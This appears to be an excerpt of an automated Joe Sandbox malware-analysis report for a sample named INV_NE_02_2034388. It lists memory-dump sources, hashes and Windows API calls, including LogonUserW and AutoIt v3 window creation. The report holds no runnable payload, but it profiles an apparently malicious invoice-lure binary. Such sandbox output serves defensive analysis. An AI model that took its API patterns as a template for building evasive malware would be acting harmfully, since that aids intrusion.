                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: mouse_event
                                          • String ID:
                                          • API String ID: 2434400541-0
                                          • Opcode ID: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                          • Instruction ID: b34e2a9394489d035c963e7dd8f40c9807a13273b0ab6c7f74163ad9f46ae88e
                                          • Opcode Fuzzy Hash: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                          • Instruction Fuzzy Hash: BED05EA032220838ECA807209D5FF7F1109E3C0B81F96854B7241853C1F8DC6801A03F
                                          APIs
                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: LogonUser
                                          • String ID:
                                          • API String ID: 1244722697-0
                                          • Opcode ID: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                          • Instruction ID: bbaf709efb0beb88cdfa5f1a33ae6004459e2c5163e494cc38a8a30eb56211a1
                                          • Opcode Fuzzy Hash: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                          • Instruction Fuzzy Hash: 49D05E3226050EAFEF018EA4DC01EAE3B69EB04B01F408521FE15D50A1C775E835AB60
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                          • Instruction ID: 5f0b767449e3d37fa0a9cb76ca1a1966b2bcebad2f74a673b8e7725f9ca30b43
                                          • Opcode Fuzzy Hash: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                          • Instruction Fuzzy Hash: E2A0113000020CAB8A022B82EC08888BFACEA022A0B008030F80C808228B32A8208A88
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                                          • Instruction ID: d3e05baf70842595a15b67714876080b4d37379fdc1224c105ba09137936e944
                                          • Opcode Fuzzy Hash: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                                          • Instruction Fuzzy Hash: 44223730904506CBDF288A68C4A47BEB7A1BF41345F28816FDD468B693DB7C9CD6C74A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                          • Instruction ID: 35e5cfd0643d00128ec34ecd890c43f992cb4d917009b55117061340238bc551
                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                          • Instruction Fuzzy Hash: 18C1D83230507349DF2D4639953403FFAA15EA27B139A076FD8B3CB2D4EE18D965D624
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                          • Instruction ID: 4494295b5c4546222a84ad3f443fcd2c01bced2acdb834a923f1c328fe2fc13d
                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                          • Instruction Fuzzy Hash: CAC1D4333090B34ADF2D4639953403FBAA15EA27B139B036FD4B2DB2D4EE18D925D624
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                          • Instruction ID: 7a836034ff4d483b0a5e627e7c6486f0e91a18695ad34818de9f4596da72514b
                                          • Opcode Fuzzy Hash: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                          • Instruction Fuzzy Hash: 99311C72D0A2947ACF338B1878086B57F64BB62774F1DC1A6E44D4B352D2219F44F651
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1343224751.0000000000E9B000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9B000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e9b000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                          • Instruction ID: 105f36ce02a81bf0a868a31056c22b1e35d6c0f571fc4c7fc545565ed6b30e66
                                          • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                          • Instruction Fuzzy Hash: 8C41D571D1051CDBCF48CFADC991AEEBBF1AF88201F548299D516AB345D734AB41DB40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1343224751.0000000000E9B000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9B000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e9b000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                          • Instruction ID: 49a1be11d3fa798ca8406d4963708c746af4b9d39a6da376e6f5f5c34f49242f
                                          • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                          • Instruction Fuzzy Hash: 3F019278A01109EFCB44DF99C5909AEF7F5FB48310F2085AAE909E7301D730AE51DB80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1343224751.0000000000E9B000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9B000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e9b000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                          • Instruction ID: d2905eb18557dec84a5c32edb135518c21d17e44c8d95005fa8e8e4b452c7e25
                                          • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                          • Instruction Fuzzy Hash: 42018078A01109EFCB44DF99C5909AEF7B5FB48314F2085A9E819A7302D730AE51DB80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1343224751.0000000000E9B000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9B000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e9b000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                          • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                          • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                          • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 0047785B
                                          • DeleteObject.GDI32(00000000), ref: 0047786D
                                          • DestroyWindow.USER32 ref: 0047787B
                                          • GetDesktopWindow.USER32 ref: 00477895
                                          • GetWindowRect.USER32(00000000), ref: 0047789C
                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 004779DD
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 004779ED
                                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477A35
                                          • GetClientRect.USER32(00000000,?), ref: 00477A41
                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00477A7B
                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477A9D
                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AB0
                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477ABB
                                          • GlobalLock.KERNEL32(00000000), ref: 00477AC4
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AD3
                                          • GlobalUnlock.KERNEL32(00000000), ref: 00477ADC
                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AE3
                                          • GlobalFree.KERNEL32(00000000), ref: 00477AEE
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477B00
                                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00492CAC,00000000), ref: 00477B16
                                          • GlobalFree.KERNEL32(00000000), ref: 00477B26
                                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00477B4C
                                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00477B6B
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477B8D
                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477D7A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                          • String ID: $AutoIt v3$DISPLAY$static
                                          • API String ID: 2211948467-2373415609
                                          • Opcode ID: cbe7ba0df42561e6311dda8264485de7e40118ff6f13b361737e76822355802e
                                          • Instruction ID: 98d8c47751f1291c48596143d1a8e41d269c6aae9b6b01708d63eada7aa7ec2c
                                          • Opcode Fuzzy Hash: cbe7ba0df42561e6311dda8264485de7e40118ff6f13b361737e76822355802e
                                          • Instruction Fuzzy Hash: DE027A71900105EFDB14DFA4DC89EAE7BB9FF49310F10856AF905AB2A1C738AD41CB68
                                          APIs
                                          • CharUpperBuffW.USER32(?,?,0048F910), ref: 00483627
                                          • IsWindowVisible.USER32(?), ref: 0048364B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: BuffCharUpperVisibleWindow
                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                          • API String ID: 4105515805-45149045
                                          • Opcode ID: df18ccac80ca4098b50a46d9e4b82a0c4588cfc9e14ecf85f4615084e1af2d64
                                          • Instruction ID: 9f5fdaa8788cae778637d634d7abea83d78ef325d3b9343814b8d9d38e530adb
                                          • Opcode Fuzzy Hash: df18ccac80ca4098b50a46d9e4b82a0c4588cfc9e14ecf85f4615084e1af2d64
                                          • Instruction Fuzzy Hash: 28D19E702042009BCA04FF11C451A6E77E5AF55759F54886EF8826B3A3DB3DEE0ACB5A
                                          APIs
                                          • SetTextColor.GDI32(?,00000000), ref: 0048A630
                                          • GetSysColorBrush.USER32(0000000F), ref: 0048A661
                                          • GetSysColor.USER32(0000000F), ref: 0048A66D
                                          • SetBkColor.GDI32(?,000000FF), ref: 0048A687
                                          • SelectObject.GDI32(?,00000000), ref: 0048A696
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
                                          • GetSysColor.USER32(00000010), ref: 0048A6C9
                                          • CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
                                          • FrameRect.USER32(?,?,00000000), ref: 0048A6DF
                                          • DeleteObject.GDI32(00000000), ref: 0048A6E6
                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
                                          • FillRect.USER32(?,?,00000000), ref: 0048A763
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0048A78E
                                            • Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
                                            • Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
                                            • Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                            • Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
                                            • Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
                                            • Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                            • Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
                                            • Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                            • Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
                                            • Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                            • Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                            • Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                            • Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 3521893082-0
                                          • Opcode ID: e736afda7f8d8f4f81f1f5e827ea2c9cb71a52f7c0883247402ba6a9b2613b70
                                          • Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
                                          • Opcode Fuzzy Hash: e736afda7f8d8f4f81f1f5e827ea2c9cb71a52f7c0883247402ba6a9b2613b70
                                          • Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A
                                          APIs
                                          • DestroyWindow.USER32(?,?,?), ref: 00402CA2
                                          • DeleteObject.GDI32(00000000), ref: 00402CE8
                                          • DeleteObject.GDI32(00000000), ref: 00402CF3
                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C43B
                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C474
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043C89D
                                            • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                          • SendMessageW.USER32(?,00001053), ref: 0043C8DA
                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043C8F1
                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C907
                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C912
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                          • String ID: 0
                                          • API String ID: 464785882-4108050209
                                          • Opcode ID: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                          • Instruction ID: 2a922f2165ff82378a3b73503dcd1cf133edd61f128b8a365017e979e5fddc8b
                                          • Opcode Fuzzy Hash: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                          • Instruction Fuzzy Hash: E112BF30604211EFDB15DF24C988BAAB7E1BF08304F54557EE855EB2A2C779E842CF99
                                          APIs
                                          • DestroyWindow.USER32(00000000), ref: 004774DE
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
                                          • GetClientRect.USER32(00000000,?), ref: 0047763F
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
                                          • GetStockObject.GDI32(00000011), ref: 004776A2
                                          • SelectObject.GDI32(00000000,00000000), ref: 004776A6
                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
                                          • DeleteDC.GDI32(00000000), ref: 004776C8
                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
                                          • GetStockObject.GDI32(00000011), ref: 004777A6
                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                          • API String ID: 2910397461-517079104
                                          • Opcode ID: 06145267f47237950f9bf2b394788d14c0e7c77fc12a147c01bfcfc54d464a41
                                          • Instruction ID: a65668349d9d90c20bc2e89cb33f711f17b366ce89c6f6fccfd6c75f405f0b1e
                                          • Opcode Fuzzy Hash: 06145267f47237950f9bf2b394788d14c0e7c77fc12a147c01bfcfc54d464a41
